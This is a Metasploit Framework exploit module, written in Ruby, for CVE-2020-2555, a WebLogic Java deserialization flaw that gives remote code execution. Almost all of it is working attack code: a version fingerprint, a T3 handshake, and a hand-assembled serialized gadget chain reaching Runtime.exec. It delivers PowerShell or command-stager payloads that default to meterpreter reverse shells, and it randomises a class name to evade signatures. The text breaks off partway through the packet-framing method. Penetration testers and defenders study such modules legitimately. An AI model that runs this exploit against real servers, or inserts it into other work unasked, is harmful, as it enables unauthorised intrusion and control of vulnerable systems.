GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
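class MetasploitModule < Msf::Exploit::Remote
  # CVE-2020-2555: unauthenticated Java deserialization in WebLogic over T3/T3S.
  #
  # build_payload_obj emits a serialized javax.management.BadAttributeValueExpException
  # whose `val` field is a com.tangosol.util.filter.LimitFilter. Deserializing the
  # exception stringifies `val`, and the filter's comparator (a ChainedExtractor of
  # ReflectionExtractors) then walks getMethod("getRuntime") -> invoke -> exec with
  # the attacker-supplied String[] (the getRuntime / getMethod / invoke / exec
  # strings are visible in the stream below).
  #
  # serialVersionUIDs, field counts and back-reference handles differ between the
  # three supported WebLogic builds, so `check` must run first to set @version_no;
  # without it the 12.2.1.4.0 layout is used (see `exploit`).
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
        'Description' => %q{
          There exists a Java object deserialization vulnerability
          in multiple versions of WebLogic.

          Unauthenticated remote code execution can be achieved
          by sending a serialized BadAttributeValueExpException object
          over the T3 protocol to vulnerable WebLogic servers.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jang', # Vuln Discovery
          'Y4er', # PoC
          'Shelby Pace', # Metasploit Module
          'Steve Embling' # T3S support
        ],
        'References' => [
          [ 'CVE', '2020-2555' ],
          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
        ],
        'Platform' => %w[unix linux win],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Privileged' => false,
        'Targets' => [
          [
            'Windows',
            {
              'Platform' => 'win',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix',
            {
              'Platform' => %w[unix linux],
              'CmdStagerFlavor' => 'printf',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ],
        ],
        'DisclosureDate' => '2020-01-15',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    # 7001 is the default WebLogic listen port; the same port serves both the
    # HTTP console used by `check` and the T3 protocol used by `exploit`.
    register_options([
      Opt::RPORT(7001),
    ])

    # Only consulted when SSL is enabled: send the plain "t3" banner instead of
    # "t3s" on the TLS socket.
    register_advanced_options([
      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
    ])
  end

  # Fingerprints WebLogic via the version string in the console login page.
  #
  # Side effect: stores the parsed version in @version_no, which every gadget
  # helper below (serialVersionUIDs, handles, field counts) keys off.
  #
  # @return [CheckCode] Appears for one of the three supported builds,
  #   Detected for any other WebLogic, Unknown when no version could be read.
  def check
    connect

    # HTTP/1.1 requires CRLF line endings; asking for Connection: close also
    # makes the single get_once read below more likely to see the whole page.
    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\r\nHost: #{peer}\r\nConnection: close\r\n\r\n"
    sock.put(web_req)
    sleep(2)
    res = sock.get_once

    # Exact builds the hard-coded gadget layouts below were captured for.
    versions = [ Rex::Version.new('12.1.3.0.0'), Rex::Version.new('12.2.1.3.0'), Rex::Version.new('12.2.1.4.0') ]

    return CheckCode::Unknown('Failed to obtain response from service') unless res

    # Named capture on the left-hand side of =~ assigns the local `version`.
    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
    return CheckCode::Unknown('Failed to detect WebLogic') unless version

    @version_no = Rex::Version.new(version)
    print_status("WebLogic version detected: #{@version_no}")

    return CheckCode::Appears if versions.include?(@version_no)

    # Other builds may still be affected by CVE-2020-2555; this module simply
    # has no gadget layout for them.
    CheckCode::Detected('WebLogic version is not supported by this module')
  ensure
    disconnect
  end

  # Performs the T3 handshake and delivers the gadget chain.
  #
  # Windows: a single PowerShell one-liner wrapped in `cmd.exe /c`.
  # Unix: the CmdStager drives execute_command once per chunk.
  def exploit
    # Every version-dependent helper falls through to its 12.2.1.4.0 branch when
    # @version_no is nil (check skipped via AutoCheck=false / ForceExploit).
    if @version_no.nil?
      print_warning('WebLogic version not detected (check skipped); assuming the 12.2.1.4.0 gadget layout')
    end

    connect
    print_status('Sending handshake...')
    t3_handshake

    if target.name == 'Windows'
      # "cmd.exe /c <powershell ...>" splits into the three String arguments
      # that build_payload_obj hands to Runtime.exec (see format_payload).
      win_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
      t3_send(build_payload_obj("cmd.exe /c #{win_cmd}"))
    else
      execute_cmdstager
    end
  ensure
    disconnect
  end

  # Sends the T3 banner "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n" (or "t3s ..."
  # on SSL unless FORCE_T3) and drains the server's HELO reply.
  #
  # NOTE(review): the reply is read but never validated; a non-T3 listener is
  # only noticed when the object send that follows produces no session.
  def t3_handshake
    shake = if !datastore['SSL'] || datastore['FORCE_T3']
              '7433' # "t3"
            else
              '743373' # "t3s"
            end
    shake << '2031322e322e310a41533a323535' # " 12.2.1\nAS:255"
    shake << '0a484c3a31390a4d533a313030303030' # "\nHL:19\nMS:100000"
    shake << '30300a0a' # "00\n\n"

    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # rubocop:disable Metrics/MethodLength
  # Builds the hex-encoded Java serialization stream for the gadget chain.
  #
  # Layout (outer to inner): BadAttributeValueExpException {cause, detailMessage,
  # stackTrace[1], suppressedExceptions, val} -> val = LimitFilter {m_comparator =
  # ChainedExtractor [ReflectionExtractor x3: getMethod("getRuntime"), invoke,
  # exec(String[])], m_oAnchorTop = class java.lang.Runtime}.
  #
  # Class-descriptor flag bytes: 0x02 = SC_SERIALIZABLE, 0x03 adds SC_WRITE_METHOD
  # (the class defines writeObject). Back-references (0x71 + 0x007e00NN) point at
  # earlier handles; their numbering shifts on 12.1.3 (see change_handle?).
  #
  # @param payload_data [String] "<shell> <flag> <command>" passed to Runtime.exec
  # @return [String] hex string, without the surrounding T3 framing
  def build_payload_obj(payload_data)
    payload_obj = 'aced' # STREAM_MAGIC
    payload_obj << '0005' # STREAM_VERSION
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002e' # Class name length: 46
    payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
    payload_obj << '67656d656e742e426164'
    payload_obj << '41747472696275746556'
    payload_obj << '616c7565457870457863'
    payload_obj << '657074696f6e'
    payload_obj << 'd4e7daab632d4640' # SerialVersionUID
    payload_obj << '020001' # SC_SERIALIZABLE, field count = 1
    payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
    payload_obj << '76616c' # Field name: val
    payload_obj << '740012' # String, length: 18
    payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '0013' # Class name length: 19
    payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
    payload_obj << '457863657074696f6e'
    payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '0013' # Class name length: 19
    payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
    payload_obj << '5468726f7761626c65'
    payload_obj << 'd5c635273977b8cb' # SerialVersionUID
    payload_obj << '030004' # SC_SERIALIZABLE|SC_WRITE_METHOD, then 4 fields
    payload_obj << '4c0005' # Field type: Object, field name length: 5
    payload_obj << '6361757365' # Field name: cause
    payload_obj << '740015' # String, length: 21
    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
    payload_obj << '2f5468726f7761626c653b'
    payload_obj << '4c000d' # Field type: Object, field name length: 13
    payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
    payload_obj << '740012' # String, length: 18
    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    payload_obj << '2f537472696e673b'
    payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
    payload_obj << '737461636b5472616365' # Field name: stackTrace
    payload_obj << '74001e' # String, length: 30
    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
    payload_obj << '672f537461636b547261'
    payload_obj << '6365456c656d656e743b'
    payload_obj << '4c0014' # Field type: Object, field name length: 20
    payload_obj << '73757070726573736564' # Field name: suppressedExceptions
    payload_obj << '457863657074696f6e73'
    payload_obj << '740010' # String, length: 16
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
    payload_obj << '2f4c6973743b'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL (no further superclass)
    # Field values follow, superclass (Throwable) first.
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0008' # cause: back-reference to handle 0x7e0008
    payload_obj << '7075' # TC_NULL (detailMessage), TC_ARRAY (stackTrace)
    payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
    payload_obj << '672e537461636b547261'
    payload_obj << '6365456c656d656e743b'
    payload_obj << '02462a3c3cfd2239' # SerialVersionUID
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000001' # array length: 1
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '001b' # Class name length: 27
    payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
    payload_obj << '537461636b5472616365'
    payload_obj << '456c656d656e74'
    payload_obj << '6109c59a2636dd85' # SerialVersionUID
    payload_obj << '020004' # SC_SERIALIZABLE, 4 fields
    payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
    payload_obj << '6c696e654e756d626572' # lineNumber
    payload_obj << '4c000e' # Field type: Object, field name length: 14
    payload_obj << '6465636c6172696e6743'
    payload_obj << '6c617373' # declaringClass
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle (Ljava/lang/String; descriptor)
    payload_obj << '4c0008' # Field type: Object, field name length: 8
    payload_obj << '66696c654e616d65' # fileName
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle
    payload_obj << '4c000a' # Field type: Object, field name length: 10
    payload_obj << '6d6574686f644e616d65' # methodName
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000028' # lineNumber: 40

    # The PoC's fixed "Weblogic_2555" class/file name is an easy signature, so
    # randomise it; only ASCII alphanumerics, so char length == byte length.
    class_name = Rex::Text.rand_text_alphanumeric(8..14)
    formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join

    payload_obj << '74' # String (declaringClass)
    payload_obj << class_name.length.to_s(16).rjust(4, '0')
    payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name
    payload_obj << '74' # String (fileName)
    payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
    payload_obj << formatted_class # Originally Weblogic_2555.java
    payload_obj << '2e6a617661' # .java
    payload_obj << '740004' # String, length: 4 (methodName)
    payload_obj << '6d61696e' # main
    # suppressedExceptions: an empty unmodifiable list.
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '0026' # Class name length: 38
    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
    payload_obj << '436f6c6c656374696f6e'
    payload_obj << '7324556e6d6f64696669'
    payload_obj << '61626c654c697374'
    payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
    payload_obj << '020001' # SC_SERIALIZABLE, 1 field
    payload_obj << '4c0004' # Field type: Object, field name length: 4
    payload_obj << '6c697374' # list
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0007' # handle (Ljava/util/List; descriptor)
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '002c' # Class name length: 44
    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
    payload_obj << '436f6c6c656374696f6e'
    payload_obj << '7324556e6d6f64696669'
    payload_obj << '61626c65436f6c6c6563'
    payload_obj << '74696f6e'
    payload_obj << '19420080cb5ef71e' # SerialVersionUID
    payload_obj << '020001' # SC_SERIALIZABLE, 1 field
    payload_obj << '4c0001' # Field type: Object, field name length: 1
    payload_obj << '63' # Field name: c
    payload_obj << '740016' # String, length: 22
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
    payload_obj << '2f436f6c6c656374696f'
    payload_obj << '6e3b'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
    payload_obj << '41727261794c697374'
    payload_obj << '7881d21d99c7619d' # SerialVersionUID
    payload_obj << '030001' # SC_SERIALIZABLE|SC_WRITE_METHOD, 1 field
    payload_obj << '490004' # Field type: Integer, field name length: 4
    payload_obj << '73697a65' # size
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000' # size: 0
    payload_obj << '7704' # TC_BLOCKDATA, length: 4
    payload_obj << '00000000' # ArrayList.writeObject capacity: 0
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
    payload_obj << '007e0015' # handle (the ArrayList, reused as `list`)
    payload_obj << '78' # TC_ENDBLOCKDATA
    # val: the LimitFilter whose toString() drives the extractor chain.
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '0024' # Class name length: 36
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
    payload_obj << '6f6c2e7574696c2e6669'
    payload_obj << '6c7465722e4c696d6974'
    payload_obj << '46696c746572'
    payload_obj << limit_filter_uid # SerialVersionUID (per WebLogic build)
    payload_obj << '020006' # SC_SERIALIZABLE, 6 fields
    payload_obj << '49000b' # Field type: Integer, field name length: 11
    payload_obj << '6d5f635061676553697a65' # m_cPageSize
    payload_obj << '490007' # Field type: Integer, field name length: 7
    payload_obj << '6d5f6e50616765' # m_nPage
    payload_obj << '4c000c' # Field type: Object, field name length: 12
    payload_obj << '6d5f636f6d70617261746f72' # m_comparator
    payload_obj << '740016' # String, length: 22
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
    payload_obj << '2f436f6d70617261746f'
    payload_obj << '723b'
    payload_obj << '4c0008' # Field type: Object, field name length: 8
    payload_obj << '6d5f66696c746572' # m_filter
    payload_obj << '74001a' # String, length: 26
    payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
    payload_obj << '736f6c2f7574696c2f46'
    payload_obj << '696c7465723b'
    payload_obj << '4c000f' # Field type: Object, field name length: 15
    payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
    payload_obj << '6f74746f6d'
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0001' # handle (Ljava/lang/Object; descriptor)
    payload_obj << '4c000c' # Field type: Object, field name length: 12
    payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0001' # handle

    # On 12.2.1.x LimitFilter extends AbstractQueryRecorderFilter; 12.1.3 has
    # no such superclass in the stream.
    unless @version_no == Rex::Version.new('12.1.3.0.0')
      payload_obj << add_class_desc
    end

    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000' # m_cPageSize: 0
    payload_obj << '00000000' # m_nPage: 0
    # m_comparator: ChainedExtractor over three ReflectionExtractors.
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002c' # Class name length: 44
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e4368'
    payload_obj << '61696e65644578747261'
    payload_obj << '63746f72'
    payload_obj << chained_extractor_uid # SerialVersionUID (per WebLogic build)
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '0036' # Class name length: 54
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e4162'
    payload_obj << '737472616374436f6d70'
    payload_obj << '6f736974654578747261'
    payload_obj << '63746f72'
    payload_obj << '086b3d8c05690f44' # SerialVersionUID
    payload_obj << '020001' # SC_SERIALIZABLE, 1 field
    payload_obj << '5b000c' # Field type: Array, field name length: 12
    payload_obj << '6d5f61457874726163746f72' # m_aExtractor
    payload_obj << '740023' # String, length: 35
    payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
    payload_obj << '6f736f6c2f7574696c2f'
    payload_obj << '56616c75654578747261'
    payload_obj << '63746f723b'
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '002d' # Class name length: 45
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e4162'
    payload_obj << '73747261637445787472'
    payload_obj << '6163746f72'
    payload_obj << abstract_extractor_uid # SerialVersionUID (per WebLogic build)
    payload_obj << '020001' # SC_SERIALIZABLE, 1 field
    payload_obj << '490009' # Field type: Integer, field name length: 9
    payload_obj << '6d5f6e546172676574' # m_nTarget
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000' # m_nTarget: 0
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0032' # Class name length: 50
    payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
    payload_obj << '6f736f6c2e7574696c2e'
    payload_obj << '657874726163746f722e'
    payload_obj << '5265666c656374696f6e'
    payload_obj << '457874726163746f723b'
    payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000003' # array length: 3 extractors
    # Extractor 1: getMethod("getRuntime", new Class[0])
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002f' # Class name length: 47
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e5265'
    payload_obj << '666c656374696f6e4578'
    payload_obj << '74726163746f72'
    payload_obj << reflection_extractor_uid # SerialVersionUID (per WebLogic build)
    payload_obj << '02000' # SC_SERIALIZABLE, field count completed below (orig: 020002)
    payload_obj << reflect_extract_count # 3 on 12.2.1.3.0 (extra m_extractorCached), else 2
    payload_obj << '5b0009' # Field type: Array, field name length: 9
    payload_obj << '6d5f616f506172616d' # m_aoParam
    payload_obj << '740013' # String, length: 19
    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
    payload_obj << '672f4f626a6563743b'
    payload_obj << add_sect # m_extractorCached descriptor, 12.2.1.3.0 only
    payload_obj << '4c0009' # Object, length: 9
    payload_obj << '6d5f734d6574686f64' # m_sMethod
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle (Ljava/lang/String; descriptor)
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE (superclass AbstractExtractor)
    payload_obj << (change_handle? ? '007e001d' : '007e001e')
    payload_obj << '00000000' # m_nTarget: 0
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC (m_aoParam)
    payload_obj << '0013' # Class name length: 19
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
    payload_obj << '672e4f626a6563743b'
    payload_obj << '90ce589f1073296c' # SerialVersionUID
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000002' # array length: 2
    payload_obj << '74000a' # String, length: 10
    payload_obj << '67657452756e74696d65' # getRuntime
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0012' # Class name length: 18
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
    payload_obj << '672e436c6173733b'
    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000' # array length: 0
    payload_obj << add_tc_null # m_extractorCached value, 12.2.1.3.0 only
    payload_obj << '740009' # String, length: 9
    payload_obj << '6765744d6574686f64' # getMethod
    # Extractor 2: invoke(null, new Object[0])
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0021' : '007e0022')
    payload_obj << '00000000' # m_nTarget: 0
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0024' : '007e0025')
    payload_obj << '00000002' # array size: 2
    payload_obj << '7075' # TC_NULL, TC_ARRAY
    payload_obj << '71' # TC_REFERENCE
    payload_obj << (change_handle? ? '007e0024' : '007e0025')
    payload_obj << '00000000' # array length: 0
    payload_obj << add_tc_null # m_extractorCached value, 12.2.1.3.0 only
    payload_obj << '740006' # TC_STRING, length: 6
    payload_obj << '696e766f6b65' # invoke
    # Extractor 3: exec(new String[]{shell, flag, command})
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0021' : '007e0022')
    payload_obj << '00000000' # m_nTarget: 0
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0024' : '007e0025')
    payload_obj << '00000001' # array length: 1
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
    payload_obj << '672e537472696e673b'
    payload_obj << 'add256e7e91d7b47' # SerialVersionUID
    payload_obj << '020000' # SC_SERIALIZABLE, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000003' # String[] length: 3 -- format_payload must emit exactly 3

    payload_bin = format_payload(payload_data)
    payload_obj << payload_bin

    # Original data
    # ---------------------------
    # payload_obj << '740007' # String, length: 7
    # payload_obj << '2f62696e2f7368' # /bin/sh
    # payload_obj << '740002' # String, length: 2
    # payload_obj << '2d63' # -c
    # payload_obj << '740017' # String, length: 23
    # payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah
    # payload_obj << '2f626c61685f7a655f62'
    # payload_obj << '6c6168'
    # ---------------------------
    payload_obj << add_tc_null # m_extractorCached value, 12.2.1.3.0 only

    payload_obj << '740004' # String, length: 4
    payload_obj << '65786563' # exec
    payload_obj << '7070' # TC_NULL, TC_NULL (m_filter, m_oAnchorBottom)
    payload_obj << '7672' # TC_CLASS, TC_CLASSDESC (m_oAnchorTop = java.lang.Runtime)
    payload_obj << '0011' # Class name length: 17
    payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
    payload_obj << '52756e74696d65'
    payload_obj << '00000000000000000000' # SerialVersionUID 0, flags 0, 0 fields
    payload_obj << '00'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
  end
  # rubocop:enable Metrics/MethodLength

  # 12.1.3.0.0 lacks the AbstractQueryRecorderFilter descriptor, so every
  # later handle number in the stream is one lower.
  def change_handle?
    @version_no == Rex::Version.new('12.1.3.0.0')
  end

  # serialVersionUID of com.tangosol.util.filter.LimitFilter; the `else`
  # branch is the 12.2.1.4.0 value and is also used when @version_no is nil.
  def limit_filter_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      '99022596d7b45953'
    when Rex::Version.new('12.2.1.3.0')
      'ab2901b976c4e271'
    else
      '954e4590be89865f'
    end
  end

  # serialVersionUID of com.tangosol.util.extractor.ChainedExtractor.
  def chained_extractor_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      '889f81b0945d5b7f'
    when Rex::Version.new('12.2.1.3.0')
      '06ee10433a4cc4b4'
    else
      '435b250b72f63db5'
    end
  end

  # serialVersionUID of com.tangosol.util.extractor.AbstractExtractor.
  def abstract_extractor_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      '658195303e723821'
    when Rex::Version.new('12.2.1.3.0')
      '752289ad4d460138'
    else
      '9b1be18ed70100e5'
    end
  end

  # serialVersionUID of com.tangosol.util.extractor.ReflectionExtractor.
  def reflection_extractor_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      'ee7ae995c02fb4a2'
    when Rex::Version.new('12.2.1.3.0')
      '87973791b26429dd'
    else
      '1f62f564b951b614'
    end
  end

  # Last hex digit of ReflectionExtractor's field count: 3 on 12.2.1.3.0, which
  # serializes the extra m_extractorCached field, otherwise 2.
  def reflect_extract_count
    case @version_no
    when Rex::Version.new('12.2.1.3.0')
      '3'
    else
      '2'
    end
  end

  # Field descriptor for ReflectionExtractor.m_extractorCached (12.2.1.3.0 only);
  # empty for every other build.
  def add_sect
    sect = ''

    if @version_no == Rex::Version.new('12.2.1.3.0')
      sect << '4c0011' # Object, length: 17
      sect << '6d5f657874726163746f' # m_extractorCached
      sect << '72436163686564'
      sect << '71' # TC_REFERENCE
      sect << '007e0001' # handle
    end

    sect
  end

  # Superclass descriptor for LimitFilter on 12.2.1.x:
  # com.tangosol.util.filter.AbstractQueryRecorderFilter with no fields.
  def add_class_desc
    class_desc = ''
    class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    class_desc << '0034' # Class name length: 52
    class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
    class_desc << '6f6c2e7574696c2e6669'
    class_desc << '6c7465722e4162737472'
    class_desc << '61637451756572795265'
    class_desc << '636f7264657246696c74'
    class_desc << '6572'
    class_desc << 'f3b98201f680eb90' # SerialVersionUID
    class_desc << '020000' # SC_SERIALIZABLE, no fields
  end

  # TC_NULL for the m_extractorCached value on 12.2.1.3.0; empty otherwise.
  def add_tc_null
    return '70' if @version_no == Rex::Version.new('12.2.1.3.0')

    ''
  end

  # Wraps the gadget stream in a T3 CMD_IDENTIFY_REQUEST message and sends it.
  #
  # The framing (ClassTableEntry / PackageInfo / PeerInfo / VersionInfo / JVMID)
  # is replayed from a capture; the leading 4-byte length is patched at the end.
  # Note for detection engineers: the JVMID blocks carry the fixed address
  # "127.0.1.1" and hostname "us-l-breens" from that capture, which is a
  # reliable on-the-wire signature for this module.
  #
  # @param payload_obj [String] hex stream from build_payload_obj
  def t3_send(payload_obj)
    print_status('Sending object...')

    request_obj = '000009f3' # Original packet length, overwritten below
    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
    request_obj << 'ffffffffffffffff'
    request_obj << '00000071'
    request_obj << '0000ea60'
    # Opaque header bytes replayed from the original capture.
    request_obj << '00000018432ec6'
    request_obj << 'a2a63985b5af7d63e643'
    request_obj << '83f42a6d92c9e9af0f94'
    request_obj << '72027973720078720178'
    request_obj << '720278700000000c0000'
    request_obj << '00020000000000000000'
    request_obj << '00000001007070707070'
    request_obj << '700000000c0000000200'
    request_obj << '00000000000000000000'
    request_obj << '01007006'
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '001d' # Class name length: 29
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
    request_obj << '6a766d2e436c61737354'
    request_obj << '61626c65456e747279'
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
    request_obj << '0c0000' # SC_BLOCK_DATA|SC_EXTERNALIZABLE, 0 fields
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5061636b61'
    request_obj << '6765496e666f'
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
    request_obj << '020009' # SC_SERIALIZABLE, 9 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
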